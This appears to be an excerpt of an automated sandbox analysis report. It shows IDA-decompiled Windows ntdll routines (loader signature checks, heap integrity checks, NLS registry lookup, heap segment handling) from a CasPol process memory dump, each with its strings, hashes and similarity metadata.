                                                                									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                								}
                                                                								if(( *_t108 & 0x00000020) != 0) {
                                                                									E016A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                								}
                                                                							}
                                                                							goto L8;
                                                                						} else {
                                                                							_v16 = _t125 + 0x24;
                                                                							_t124 = E0165A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                							if(_t124 < 0) {
                                                                								E0162B1E1(_t124, 0x1490, 0, _v16);
                                                                								goto L8;
                                                                							}
                                                                							goto L14;
                                                                						}
                                                                					} else {
                                                                						goto L8;
                                                                					}
                                                                				}
                                                                			}




















                                                                Strings
                                                                • LdrpCompleteMapModule, xrefs: 01689898
                                                                • minkernel\ntdll\ldrmap.c, xrefs: 016898A2
                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 01689891
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                • API String ID: 0-1676968949
                                                                • Opcode ID: 90c536bfc4825e2e4964e89f0c7a41fc099487e8df42b888999c078a08a8c0ee
                                                                • Instruction ID: 7b99ad89cdb24a8f306c764da529a9a409f493f13342ee7a4a52c6fb8a39bb84
                                                                • Opcode Fuzzy Hash: 90c536bfc4825e2e4964e89f0c7a41fc099487e8df42b888999c078a08a8c0ee
                                                                • Instruction Fuzzy Hash: 185102B2A04746DBEB26DB6CCD44B2A7BE5FB80314F040AA9E9519B7D1D730ED01CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 64%
                                                                			E016D23E3(signed int __ecx, unsigned int __edx) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _t42;
                                                                				char _t43;
                                                                				signed short _t44;
                                                                				signed short _t48;
                                                                				signed char _t51;
                                                                				signed short _t52;
                                                                				intOrPtr _t54;
                                                                				signed short _t64;
                                                                				signed short _t66;
                                                                				intOrPtr _t69;
                                                                				signed short _t73;
                                                                				signed short _t76;
                                                                				signed short _t77;
                                                                				signed short _t79;
                                                                				void* _t83;
                                                                				signed int _t84;
                                                                				signed int _t85;
                                                                				signed char _t94;
                                                                				unsigned int _t99;
                                                                				unsigned int _t104;
                                                                				signed int _t108;
                                                                				void* _t110;
                                                                				void* _t111;
                                                                				unsigned int _t114;
                                                                
                                                                				_t84 = __ecx;
                                                                				_push(__ecx);
                                                                				_t114 = __edx;
                                                                				_t42 =  *((intOrPtr*)(__edx + 7));
                                                                				if(_t42 == 1) {
                                                                					L49:
                                                                					_t43 = 1;
                                                                					L50:
                                                                					return _t43;
                                                                				}
                                                                				if(_t42 != 4) {
                                                                					if(_t42 >= 0) {
                                                                						if( *(__ecx + 0x4c) == 0) {
                                                                							_t44 =  *__edx & 0x0000ffff;
                                                                						} else {
                                                                							_t73 =  *__edx;
                                                                							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                                                								_t73 = _t73 ^  *(__ecx + 0x50);
                                                                							}
                                                                							_t44 = _t73 & 0x0000ffff;
                                                                						}
                                                                					} else {
                                                                						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x171874c ^ __ecx;
                                                                						if(_t104 == 0) {
                                                                							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                                                						} else {
                                                                							_t76 = 0;
                                                                						}
                                                                						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                                                					}
                                                                					_t94 =  *((intOrPtr*)(_t114 + 7));
                                                                					_t108 = _t44 & 0xffff;
                                                                					if(_t94 != 5) {
                                                                						if((_t94 & 0x00000040) == 0) {
                                                                							if((_t94 & 0x0000003f) == 0x3f) {
                                                                								if(_t94 >= 0) {
                                                                									if( *(_t84 + 0x4c) == 0) {
                                                                										_t48 =  *_t114 & 0x0000ffff;
                                                                									} else {
                                                                										_t66 =  *_t114;
                                                                										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                                                											_t66 = _t66 ^  *(_t84 + 0x50);
                                                                										}
                                                                										_t48 = _t66 & 0x0000ffff;
                                                                									}
                                                                								} else {
                                                                									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x171874c ^ _t84;
                                                                									if(_t99 == 0) {
                                                                										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                                                									} else {
                                                                										_t69 = 0;
                                                                									}
                                                                									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                                                								}
                                                                								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                                                							} else {
                                                                								_t85 = _t94 & 0x3f;
                                                                							}
                                                                						} else {
                                                                							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                                                						}
                                                                					} else {
                                                                						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                                                					}
                                                                					_t110 = (_t108 << 3) - _t85;
                                                                				} else {
                                                                					if( *(__ecx + 0x4c) == 0) {
                                                                						_t77 =  *__edx & 0x0000ffff;
                                                                					} else {
                                                                						_t79 =  *__edx;
                                                                						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                                                							_t79 = _t79 ^  *(__ecx + 0x50);
                                                                						}
                                                                						_t77 = _t79 & 0x0000ffff;
                                                                					}
                                                                					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                                                				}
                                                                				_t51 =  *((intOrPtr*)(_t114 + 7));
                                                                				if(_t51 != 5) {
                                                                					if((_t51 & 0x00000040) == 0) {
                                                                						_t52 = 0;
                                                                						goto L42;
                                                                					}
                                                                					_t64 = _t51 & 0x3f;
                                                                					goto L38;
                                                                				} else {
                                                                					_t64 =  *(_t114 + 6) & 0x000000ff;
                                                                					L38:
                                                                					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                                                					L42:
                                                                					_t35 = _t114 + 8; // -16
                                                                					_t111 = _t110 + (_t52 & 0x0000ffff);
                                                                					_t83 = _t35 + _t111;
                                                                					_t54 = E0167D4F0(_t83, 0x1606c58, 8);
                                                                					_v8 = _t54;
                                                                					if(_t54 == 8) {
                                                                						goto L49;
                                                                					}
                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                						_push("HEAP: ");
                                                                						E0162B150();
                                                                					} else {
                                                                						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                					}
                                                                					_push(_t111);
                                                                					_push(_v8 + _t83);
                                                                					E0162B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                                                					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                						 *0x1716378 = 1;
                                                                						asm("int3");
                                                                						 *0x1716378 = 0;
                                                                					}
                                                                					_t43 = 0;
                                                                					goto L50;
                                                                				}
                                                                			}




























                                                                Strings
                                                                • HEAP[%wZ]: , xrefs: 016D254F
                                                                • HEAP: , xrefs: 016D255C
                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 016D256F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                • API String ID: 0-3815128232
                                                                • Opcode ID: dfbfbc1ac80459bb9f092a2cba36dfaf4ef255307949cba428a9fe2f65f6c8b9
                                                                • Instruction ID: ebec3ea87910d809e6f3bcdc52a1e6736063465e59eb73d53716fb7e1b85440b
                                                                • Opcode Fuzzy Hash: dfbfbc1ac80459bb9f092a2cba36dfaf4ef255307949cba428a9fe2f65f6c8b9
                                                                • Instruction Fuzzy Hash: 0C5103349012608AE375CF2ECC68B727BF1EB48645F55889DECC28B285D776D887DB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 93%
                                                                			E0162E620(void* __ecx, short* __edx, short* _a4) {
                                                                				char _v16;
                                                                				char _v20;
                                                                				intOrPtr _v24;
                                                                				char* _v28;
                                                                				char _v32;
                                                                				char _v36;
                                                                				char _v44;
                                                                				signed int _v48;
                                                                				intOrPtr _v52;
                                                                				void* _v56;
                                                                				void* _v60;
                                                                				char _v64;
                                                                				void* _v68;
                                                                				void* _v76;
                                                                				void* _v84;
                                                                				signed int _t59;
                                                                				signed int _t74;
                                                                				signed short* _t75;
                                                                				signed int _t76;
                                                                				signed short* _t78;
                                                                				signed int _t83;
                                                                				short* _t93;
                                                                				signed short* _t94;
                                                                				short* _t96;
                                                                				void* _t97;
                                                                				signed int _t99;
                                                                				void* _t101;
                                                                				void* _t102;
                                                                
                                                                				_t80 = __ecx;
                                                                				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                				_t96 = __edx;
                                                                				_v44 = __edx;
                                                                				_t78 = 0;
                                                                				_v56 = 0;
                                                                				if(__ecx == 0 || __edx == 0) {
                                                                					L28:
                                                                					_t97 = 0xc000000d;
                                                                				} else {
                                                                					_t93 = _a4;
                                                                					if(_t93 == 0) {
                                                                						goto L28;
                                                                					}
                                                                					_t78 = E0162F358(__ecx, 0xac);
                                                                					if(_t78 == 0) {
                                                                						_t97 = 0xc0000017;
                                                                						L6:
                                                                						if(_v56 != 0) {
                                                                							_push(_v56);
                                                                							E016695D0();
                                                                						}
                                                                						if(_t78 != 0) {
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                						}
                                                                						return _t97;
                                                                					}
                                                                					E0166FA60(_t78, 0, 0x158);
                                                                					_v48 = _v48 & 0x00000000;
                                                                					_t102 = _t101 + 0xc;
                                                                					 *_t96 = 0;
                                                                					 *_t93 = 0;
                                                                					E0166BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                					_v36 = 0x18;
                                                                					_v28 =  &_v44;
                                                                					_v64 = 0;
                                                                					_push( &_v36);
                                                                					_push(0x20019);
                                                                					_v32 = 0;
                                                                					_push( &_v64);
                                                                					_v24 = 0x40;
                                                                					_v20 = 0;
                                                                					_v16 = 0;
                                                                					_t97 = E01669600();
                                                                					if(_t97 < 0) {
                                                                						goto L6;
                                                                					}
                                                                					E0166BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                					_push(0);
                                                                					_v48 = 4;
                                                                					_t97 = L0162F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                					if(_t97 >= 0) {
                                                                						if(_v52 != 1) {
                                                                							L17:
                                                                							_t97 = 0xc0000001;
                                                                							goto L6;
                                                                						}
                                                                						_t59 =  *_t78 & 0x0000ffff;
                                                                						_t94 = _t78;
                                                                						_t83 = _t59;
                                                                						if(_t59 == 0) {
                                                                							L19:
                                                                							if(_t83 == 0) {
                                                                								L23:
                                                                								E0166BB40(_t83, _t102 + 0x24, _t78);
                                                                								if(L016343C0( &_v48,  &_v64) == 0) {
                                                                									goto L17;
                                                                								}
                                                                								_t84 = _v48;
                                                                								 *_v48 = _v56;
                                                                								if( *_t94 != 0) {
                                                                									E0166BB40(_t84, _t102 + 0x24, _t94);
                                                                									if(L016343C0( &_v48,  &_v64) != 0) {
                                                                										 *_a4 = _v56;
                                                                									} else {
                                                                										_t97 = 0xc0000001;
                                                                										 *_v48 = 0;
                                                                									}
                                                                								}
                                                                								goto L6;
                                                                							}
                                                                							_t83 = _t83 & 0x0000ffff;
                                                                							while(_t83 == 0x20) {
                                                                								_t94 =  &(_t94[1]);
                                                                								_t74 =  *_t94 & 0x0000ffff;
                                                                								_t83 = _t74;
                                                                								if(_t74 != 0) {
                                                                									continue;
                                                                								}
                                                                								goto L23;
                                                                							}
                                                                							goto L23;
                                                                						} else {
                                                                							goto L14;
                                                                						}
                                                                						while(1) {
                                                                							L14:
                                                                							_t27 =  &(_t94[1]); // 0x2
                                                                							_t75 = _t27;
                                                                							if(_t83 == 0x2c) {
                                                                								break;
                                                                							}
                                                                							_t94 = _t75;
                                                                							_t76 =  *_t94 & 0x0000ffff;
                                                                							_t83 = _t76;
                                                                							if(_t76 != 0) {
                                                                								continue;
                                                                							}
                                                                							goto L23;
                                                                						}
                                                                						 *_t94 = 0;
                                                                						_t94 = _t75;
                                                                						_t83 =  *_t75 & 0x0000ffff;
                                                                						goto L19;
                                                                					}
                                                                				}
                                                                			}


                                                                Strings
                                                                • @, xrefs: 0162E6C0
                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0162E68C
                                                                • InstallLanguageFallback, xrefs: 0162E6DB
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                • API String ID: 0-1757540487
                                                                • Opcode ID: 6926b86c86b67588c578c202c68cd819c1853080fe98d5058a1a97f905eacf44
                                                                • Instruction ID: 1ca0ffe770921a8ea183744744c34b990a89ae19c6b0f32f754d06765d11b189
                                                                • Opcode Fuzzy Hash: 6926b86c86b67588c578c202c68cd819c1853080fe98d5058a1a97f905eacf44
                                                                • Instruction Fuzzy Hash: F251C1726053169BD710EF68C850A7BB3E9AF98714F040A6EF986D7340EB35D904CBA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 60%
                                                                			E0164B8E4(unsigned int __edx) {
                                                                				void* __ecx;
                                                                				void* __edi;
                                                                				intOrPtr* _t16;
                                                                				intOrPtr _t18;
                                                                				void* _t27;
                                                                				void* _t28;
                                                                				unsigned int _t30;
                                                                				intOrPtr* _t31;
                                                                				unsigned int _t38;
                                                                				void* _t39;
                                                                				unsigned int _t40;
                                                                
                                                                				_t40 = __edx;
                                                                				_t39 = _t28;
                                                                				if( *0x1718748 >= 1) {
                                                                					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                                                					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                                                						_t18 =  *[fs:0x30];
                                                                						__eflags =  *(_t18 + 0xc);
                                                                						if( *(_t18 + 0xc) == 0) {
                                                                							_push("HEAP: ");
                                                                							E0162B150();
                                                                						} else {
                                                                							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                						}
                                                                						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                                                						E0162B150();
                                                                						__eflags =  *0x1717bc8;
                                                                						if(__eflags == 0) {
                                                                							E016E2073(_t27, 1, _t39, __eflags);
                                                                						}
                                                                					}
                                                                				}
                                                                				_t38 =  *(_t39 + 0xb8);
                                                                				if(_t38 != 0) {
                                                                					_t13 = _t40 >> 0xc;
                                                                					__eflags = _t13;
                                                                					while(1) {
                                                                						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                                                						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                                                							break;
                                                                						}
                                                                						_t30 =  *_t38;
                                                                						__eflags = _t30;
                                                                						if(_t30 != 0) {
                                                                							_t38 = _t30;
                                                                							continue;
                                                                						}
                                                                						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                						break;
                                                                					}
                                                                					return E0164AB40(_t39, _t38, 0, _t13, _t40);
                                                                				} else {
                                                                					_t31 = _t39 + 0x8c;
                                                                					_t16 =  *_t31;
                                                                					while(_t31 != _t16) {
                                                                						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                                                						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                                                							return _t16;
                                                                						}
                                                                						_t16 =  *_t16;
                                                                					}
                                                                					return _t31;
                                                                				}
                                                                			}


                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-2558761708
                                                                • Opcode ID: 5c8df625c62305eaab131ae0e41cbff6e552fd583a1b46c75b5adc4358f1460b
                                                                • Instruction ID: 1c19a30d87cdb88cf0e422622f0380a4a9138c0db6e9af1084dd03b81237c4fb
                                                                • Opcode Fuzzy Hash: 5c8df625c62305eaab131ae0e41cbff6e552fd583a1b46c75b5adc4358f1460b
                                                                • Instruction Fuzzy Hash: 7C11E2353055029FEB2DDB19CC94B36B7AAEF41621F29812DE40BCB381D730D881CB49
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 60%
                                                                			E016EE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                				signed int _v20;
                                                                				char _v24;
                                                                				signed int _v40;
                                                                				char _v44;
                                                                				intOrPtr _v48;
                                                                				signed int _v52;
                                                                				unsigned int _v56;
                                                                				char _v60;
                                                                				signed int _v64;
                                                                				char _v68;
                                                                				signed int _v72;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				char _t87;
                                                                				signed int _t90;
                                                                				signed int _t94;
                                                                				signed int _t100;
                                                                				intOrPtr* _t113;
                                                                				signed int _t122;
                                                                				void* _t132;
                                                                				void* _t135;
                                                                				signed int _t139;
                                                                				signed int* _t141;
                                                                				signed int _t146;
                                                                				signed int _t147;
                                                                				void* _t153;
                                                                				signed int _t155;
                                                                				signed int _t159;
                                                                				char _t166;
                                                                				void* _t172;
                                                                				void* _t176;
                                                                				signed int _t177;
                                                                				intOrPtr* _t179;
                                                                
                                                                				_t179 = __ecx;
                                                                				_v48 = __edx;
                                                                				_v68 = 0;
                                                                				_v72 = 0;
                                                                				_push(__ecx[1]);
                                                                				_push( *__ecx);
                                                                				_push(0);
                                                                				_t153 = 0x14;
                                                                				_t135 = _t153;
                                                                				_t132 = E016EBBBB(_t135, _t153);
                                                                				if(_t132 == 0) {
                                                                					_t166 = _v68;
                                                                					goto L43;
                                                                				} else {
                                                                					_t155 = 0;
                                                                					_v52 = 0;
                                                                					asm("stosd");
                                                                					asm("stosd");
                                                                					asm("stosd");
                                                                					asm("stosd");
                                                                					asm("stosd");
                                                                					_v56 = __ecx[1];
                                                                					if( *__ecx >> 8 < 2) {
                                                                						_t155 = 1;
                                                                						_v52 = 1;
                                                                					}
                                                                					_t139 = _a4;
                                                                					_t87 = (_t155 << 0xc) + _t139;
                                                                					_v60 = _t87;
                                                                					if(_t87 < _t139) {
                                                                						L11:
                                                                						_t166 = _v68;
                                                                						L12:
                                                                						if(_t132 != 0) {
                                                                							E016EBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                						}
                                                                						L43:
                                                                						if(_v72 != 0) {
                                                                							_push( *((intOrPtr*)(_t179 + 4)));
                                                                							_push( *_t179);
                                                                							_push(0x8000);
                                                                							E016EAFDE( &_v72,  &_v60);
                                                                						}
                                                                						L46:
                                                                						return _t166;
                                                                					}
                                                                					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                					asm("sbb edi, edi");
                                                                					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                					if(_t90 != 0) {
                                                                						_push(0);
                                                                						_push(0x14);
                                                                						_push( &_v44);
                                                                						_push(3);
                                                                						_push(_t179);
                                                                						_push(0xffffffff);
                                                                						if(E01669730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                							_push(_t139);
                                                                							E016EA80D(_t179, 1, _v40, 0);
                                                                							_t172 = 4;
                                                                						}
                                                                					}
                                                                					_t141 =  &_v72;
                                                                					if(E016EA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                						_v64 = _a4;
                                                                						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                						asm("sbb edi, edi");
                                                                						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                						if(_t94 != 0) {
                                                                							_push(0);
                                                                							_push(0x14);
                                                                							_push( &_v24);
                                                                							_push(3);
                                                                							_push(_t179);
                                                                							_push(0xffffffff);
                                                                							if(E01669730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                								_push(_t141);
                                                                								E016EA80D(_t179, 1, _v20, 0);
                                                                								_t176 = 4;
                                                                							}
                                                                						}
                                                                						if(E016EA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                							goto L11;
                                                                						} else {
                                                                							_t177 = _v64;
                                                                							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                							_t100 = _v52 + _v52;
                                                                							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                							 *(_t132 + 0x10) = _t146;
                                                                							asm("bsf eax, [esp+0x18]");
                                                                							_v52 = _t100;
                                                                							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                							_t47 =  &_a8;
                                                                							 *_t47 = _a8 & 0x00000001;
                                                                							if( *_t47 == 0) {
                                                                								E01642280(_t179 + 0x30, _t179 + 0x30);
                                                                							}
                                                                							_t147 =  *(_t179 + 0x34);
                                                                							_t159 =  *(_t179 + 0x38) & 1;
                                                                							_v68 = 0;
                                                                							if(_t147 == 0) {
                                                                								L35:
                                                                								E0163B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                								if(_a8 == 0) {
                                                                									E0163FFB0(_t132, _t177, _t179 + 0x30);
                                                                								}
                                                                								asm("lock xadd [eax], ecx");
                                                                								asm("lock xadd [eax], edx");
                                                                								_t132 = 0;
                                                                								_v72 = _v72 & 0;
                                                                								_v68 = _v72;
                                                                								if(E01647D50() == 0) {
                                                                									_t113 = 0x7ffe0388;
                                                                								} else {
                                                                									_t177 = _v64;
                                                                									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                								}
                                                                								if( *_t113 == _t132) {
                                                                									_t166 = _v68;
                                                                									goto L46;
                                                                								} else {
                                                                									_t166 = _v68;
                                                                									E016DFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                									goto L12;
                                                                								}
                                                                							} else {
                                                                								L23:
                                                                								while(1) {
                                                                									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                										_t122 =  *_t147;
                                                                										if(_t159 == 0) {
                                                                											L32:
                                                                											if(_t122 == 0) {
                                                                												L34:
                                                                												_v68 = 0;
                                                                												goto L35;
                                                                											}
                                                                											L33:
                                                                											_t147 = _t122;
                                                                											continue;
                                                                										}
                                                                										if(_t122 == 0) {
                                                                											goto L34;
                                                                										}
                                                                										_t122 = _t122 ^ _t147;
                                                                										goto L32;
                                                                									}
                                                                									_t122 =  *(_t147 + 4);
                                                                									if(_t159 == 0) {
                                                                										L27:
                                                                										if(_t122 != 0) {
                                                                											goto L33;
                                                                										}
                                                                										L28:
                                                                										_v68 = 1;
                                                                										goto L35;
                                                                									}
                                                                									if(_t122 == 0) {
                                                                										goto L28;
                                                                									}
                                                                									_t122 = _t122 ^ _t147;
                                                                									goto L27;
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                					_v72 = _v72 & 0x00000000;
                                                                					goto L11;
                                                                				}
                                                                			}




































                                                                0x00000000
                                                                0x016ee752
                                                                0x00000000
                                                                0x016ee752
                                                                0x016ee730
                                                                0x016ee735
                                                                0x016ee73d
                                                                0x016ee73f
                                                                0x00000000
                                                                0x00000000
                                                                0x016ee741
                                                                0x016ee741
                                                                0x00000000
                                                                0x016ee741
                                                                0x016ee739
                                                                0x00000000
                                                                0x00000000
                                                                0x016ee73b
                                                                0x00000000
                                                                0x016ee73b
                                                                0x016ee722
                                                                0x016ee720
                                                                0x016ee6b0
                                                                0x016ee618
                                                                0x00000000
                                                                0x016ee618

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `$`
                                                                • API String ID: 0-197956300
                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                • Instruction ID: ab0ec8ac83e067ef5419767d180b486fc131d4215f4ae32044b96e766b239ba6
                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                • Instruction Fuzzy Hash: DF9192312053429FEB24CF69CC49B27BBE6AF84714F148A2DF695CB290E776E904CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 77%
                                                                			E016A51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                				signed short* _t63;
                                                                				signed int _t64;
                                                                				signed int _t65;
                                                                				signed int _t67;
                                                                				intOrPtr _t74;
                                                                				intOrPtr _t84;
                                                                				intOrPtr _t88;
                                                                				intOrPtr _t94;
                                                                				void* _t100;
                                                                				void* _t103;
                                                                				intOrPtr _t105;
                                                                				signed int _t106;
                                                                				short* _t108;
                                                                				signed int _t110;
                                                                				signed int _t113;
                                                                				signed int* _t115;
                                                                				signed short* _t117;
                                                                				void* _t118;
                                                                				void* _t119;
                                                                
                                                                				_push(0x80);
                                                                				_push(0x17005f0);
                                                                				E0167D0E8(__ebx, __edi, __esi);
                                                                				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                				_t115 =  *(_t118 + 0xc);
                                                                				 *(_t118 - 0x7c) = _t115;
                                                                				 *((char*)(_t118 - 0x65)) = 0;
                                                                				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                				_t113 = 0;
                                                                				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                				_t100 = __ecx;
                                                                				if(_t100 == 0) {
                                                                					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                					E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                					 *((char*)(_t118 - 0x65)) = 1;
                                                                					_t63 =  *(_t118 - 0x90);
                                                                					_t101 = _t63[2];
                                                                					_t64 =  *_t63 & 0x0000ffff;
                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                					L20:
                                                                					_t65 = _t64 >> 1;
                                                                					L21:
                                                                					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                					if(_t108 == 0) {
                                                                						L27:
                                                                						 *_t115 = _t65 + 1;
                                                                						_t67 = 0xc0000023;
                                                                						L28:
                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                						L29:
                                                                						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                						E016A53CA(0);
                                                                						return E0167D130(0, _t113, _t115);
                                                                					}
                                                                					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                							 *_t108 = 0;
                                                                						}
                                                                						goto L27;
                                                                					}
                                                                					 *_t115 = _t65;
                                                                					_t115 = _t65 + _t65;
                                                                					E0166F3E0(_t108, _t101, _t115);
                                                                					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                					_t67 = 0;
                                                                					goto L28;
                                                                				}
                                                                				_t103 = _t100 - 1;
                                                                				if(_t103 == 0) {
                                                                					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                					_t74 = E01643690(1, _t117, 0x1601810, _t118 - 0x74);
                                                                					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                					_t101 = _t117[2];
                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                					if(_t74 < 0) {
                                                                						_t64 =  *_t117 & 0x0000ffff;
                                                                						_t115 =  *(_t118 - 0x7c);
                                                                						goto L20;
                                                                					}
                                                                					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                					_t115 =  *(_t118 - 0x7c);
                                                                					goto L21;
                                                                				}
                                                                				if(_t103 == 1) {
                                                                					_t105 = 4;
                                                                					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                					_push(_t118 - 0x70);
                                                                					_push(0);
                                                                					_push(0);
                                                                					_push(_t105);
                                                                					_push(_t118 - 0x78);
                                                                					_push(0x6b);
